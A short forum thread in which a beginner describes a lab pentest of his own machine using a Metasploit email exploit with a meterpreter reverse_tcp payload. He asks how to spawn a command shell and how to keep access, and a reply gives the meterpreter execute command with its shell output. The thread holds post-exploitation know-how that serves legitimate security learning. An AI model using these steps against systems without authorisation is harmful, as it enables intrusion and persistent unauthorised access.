
Thread: Email Exploit Command Prompt

  1. #1
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    10

    Email Exploit Command Prompt

    Hi to all,
    I'm very new to all this kind of stuff and I find it very interesting and helpful as I can secure my small office. Now going straight to the point.

    I tried my first pentest using the Metasploit email exploit (windows/email/ani_loadimage_chunksize), a client-side attack. I used my new machine as the victim and my old machine to boot up the BackTrack 3 beta Live CD. Everything went fine and I had typed in the right things. The victim checked his email and boom he was pawned. I got an active session with his Windows box but I was not able to open a command prompt from his Windows box as I dunno the right command.

    I used payload: windows/meterpreter/reverse_tcp (so that the .dll file would be injected into memory, and I am aware that "generic/shell_reverse_tcp" will give me a cmd but I prefer meterpreter), which doesn't pop up a shell/CMD. I'm using BackTrack 3 beta and I used the following command "execute -f cmd -c -H -i" but it didn't work as it doesn't recognize the command "execute", though it worked fine on BackTrack 2. So please can anyone tell me what the command is and also what I would need to do in order to have access to that comp again in future (like create an Administrator U Account, etc.). All suggestions are welcome and also any kind of help.

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,126


    To be honest the meterpreter is a fairly complex payload. You may want to start with something easier. Here is the command to open a c:/ prompt

    meterpreter > execute -f cmd.exe -c -H -i
    Process 1744 created.
    Channel 89 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>


    You may also want to read the .pdf

  3. #3
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    10


    Quote Originally Posted by pureh@te View Post
    To be honest the meterpreter is a fairly complex payload. You may want to start with something easier. Here is the command to open a c:/ prompt

    meterpreter > execute -f cmd.exe -c -H -i
    Process 1744 created.
    Channel 89 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>

    I'll start off with the basic one (Payload). Thanks a lot for your help, much needed.
